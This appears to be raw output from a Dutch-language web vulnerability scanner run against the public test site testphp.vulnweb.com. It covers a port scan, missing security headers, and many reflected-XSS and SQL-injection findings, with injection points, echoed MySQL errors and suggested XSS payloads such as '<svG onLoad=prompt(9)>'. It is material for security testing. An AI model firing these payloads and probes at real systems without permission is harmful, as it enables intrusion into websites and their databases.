[i] RESULTATEN VAN DE PORTSCAN:
-----------------------
[i] Host: 127.0.0.1 (localhost)
[i] Status: up
-----------------------
[i] De scan heeft 0.43 seconden geduurd.
[i] 1 host(s) gescand op poorten 1-100.
None

[i] RESULTATEN VAN DE HTTP HEADER CONTROLE: 
-----------------------
[i] Response header opgehaald van http://testphp.vulnweb.com
[i] Controleren op NCSC waarden...
-----
[!] X-Content-Type-Options mist.
[!] Content-Security-Policy mist.
[!] Referrer-Policy mist.
[!] Strict-Transport-Security mist.
[!] X-Frame-Options mist.
------------

Controleren op onnodige request methodes:
-----
[*] Ophalen van response header met request method GET is mogelijk.
[*] Ophalen van response header met request method POST is mogelijk.
[*] Ophalen van response header met request method HEAD is mogelijk.
------------

{'Server': 'nginx/1.19.0', 'Date': 'Tue, 21 Jun 2022 12:33:08 GMT', 'Content-Type': 'text/html', 'Content-Length': '157', 'Connection': 'keep-alive'}
Server nginx/1.19.0
Controleren op mogelijk overbodige headers:
-----
[i] Server: nginx/1.19.0
[i] Date: Tue, 21 Jun 2022 12:33:08 GMT
False

[i] RESULTATEN VAN DE TLS-SCAN:
[i] http://testphp.vulnweb.com maakt gebruik van TLS-versies: 
[i] http://testphp.vulnweb.com maakt gebruik van 0 ciphers.
None

[i] MOGELIJKE XSS-KWETSBAARHEDEN: 
ulnweb.com/userinfo.php
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjkp'"(){}<x>:/1zqjkp;9
[+] Type: form
[+] Injectiepunten: pass
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/hpp/?pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjbn'%22()%7B%7D%3Cx%3E:/1zqjbn;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjbn'"(){}<x>:/1zqjbn;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: x"><svG onLoad=prompt(9)>, x"/onmouseover=prompt(9)/", x" onmouseover=prompt(9) "
[i] Line: <a href="params.php?p=valid&pp=1zqjbn'"(){}<x>:/1zqjbn;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjbo'%22()%7B%7D%3Cx%3E:/1zqjbo;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjbo'"(){}<x>:/1zqjbo;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <pvalid1zqjbo'"(){}<x>:/1zqjbo;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjyc'%22()%7B%7D%3Cx%3E:/1zqjyc;9&pp=12
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjyc'"(){}<x>:/1zqjyc;9
[+] Type: url
[+] Injectiepunten: p
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p1zqjyc'"(){}<x>:/1zqjyc;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjvx'%22()%7B%7D%3Cx%3E:/1zqjvx;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvx'"(){}<x>:/1zqjvx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjvx'%22()%7B%7D%3Cx%3E:/1zqjvx;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjvx'"(){}<x>:/1zqjvx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjvx;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjgr'%22()%7B%7D%3Cx%3E:/1zqjgr;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjgr'"(){}<x>:/1zqjgr;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjgr'%22()%7B%7D%3Cx%3E:/1zqjgr;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjgr'"(){}<x>:/1zqjgr;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjgr;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjge'%22()%7B%7D%3Cx%3E:/1zqjge;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjge'"(){}<x>:/1zqjge;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjge'"(){}<x>:/1zqjge;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=7
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjwp'%22()%7B%7D%3Cx%3E:/1zqjwp;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjwp'"(){}<x>:/1zqjwp;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjdz'%22()%7B%7D%3Cx%3E:/1zqjdz;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjdz'"(){}<x>:/1zqjdz;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjdz'"(){}<x>:/1zqjdz;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjhc'%22()%7B%7D%3Cx%3E:/1zqjhc;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjhc'"(){}<x>:/1zqjhc;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjhc'%22()%7B%7D%3Cx%3E:/1zqjhc;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjhc'"(){}<x>:/1zqjhc;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjhc;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/product.php?pic=5
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjdf'%22()%7B%7D%3Cx%3E:/1zqjdf;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjdf'"(){}<x>:/1zqjdf;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=3
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjak'%22()%7B%7D%3Cx%3E:/1zqjak;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjak'"(){}<x>:/1zqjak;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=2
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjtk'%22()%7B%7D%3Cx%3E:/1zqjtk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjtk'"(){}<x>:/1zqjtk;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjys'%22()%7B%7D%3Cx%3E:/1zqjys;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjys'"(){}<x>:/1zqjys;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjys'"(){}<x>:/1zqjys;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=1
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjzx'%22()%7B%7D%3Cx%3E:/1zqjzx;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjzx'"(){}<x>:/1zqjzx;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjtm'%22()%7B%7D%3Cx%3E:/1zqjtm;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjtm'"(){}<x>:/1zqjtm;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjtm'"(){}<x>:/1zqjtm;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjij'%22()%7B%7D%3Cx%3E:/1zqjij;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjij'"(){}<x>:/1zqjij;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjij'"(){}<x>:/1zqjij;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=6
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjxd'%22()%7B%7D%3Cx%3E:/1zqjxd;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjxd'"(){}<x>:/1zqjxd;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjwz'%22()%7B%7D%3Cx%3E:/1zqjwz;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjwz'"(){}<x>:/1zqjwz;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjwz'"(){}<x>:/1zqjwz;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=4
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjqm'%22()%7B%7D%3Cx%3E:/1zqjqm;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjqm'"(){}<x>:/1zqjqm;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjio'%22()%7B%7D%3Cx%3E:/1zqjio;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjio'"(){}<x>:/1zqjio;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjio'"(){}<x>:/1zqjio;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjbx'%22()%7B%7D%3Cx%3E:/1zqjbx;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjbx'"(){}<x>:/1zqjbx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjbx'%22()%7B%7D%3Cx%3E:/1zqjbx;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjbx'"(){}<x>:/1zqjbx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjbx;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/artists.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjva'%22()%7B%7D%3Cx%3E:/1zqjva;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjva'"(){}<x>:/1zqjva;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjec'%22()%7B%7D%3Cx%3E:/1zqjec;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjec'"(){}<x>:/1zqjec;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjcn'%22()%7B%7D%3Cx%3E:/1zqjcn;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjcn'"(){}<x>:/1zqjcn;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjsk'%22()%7B%7D%3Cx%3E:/1zqjsk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjsk'"(){}<x>:/1zqjsk;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjsk'%22()%7B%7D%3Cx%3E:/1zqjsk;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjsk'"(){}<x>:/1zqjsk;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjsk;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjmg'%22()%7B%7D%3Cx%3E:/1zqjmg;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjmg'"(){}<x>:/1zqjmg;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjmg'%22()%7B%7D%3Cx%3E:/1zqjmg;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjmg'"(){}<x>:/1zqjmg;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjmg;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjzv'%22()%7B%7D%3Cx%3E:/1zqjzv;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjzv'"(){}<x>:/1zqjzv;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjzv'%22()%7B%7D%3Cx%3E:/1zqjzv;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjzv'"(){}<x>:/1zqjzv;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjzv;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.
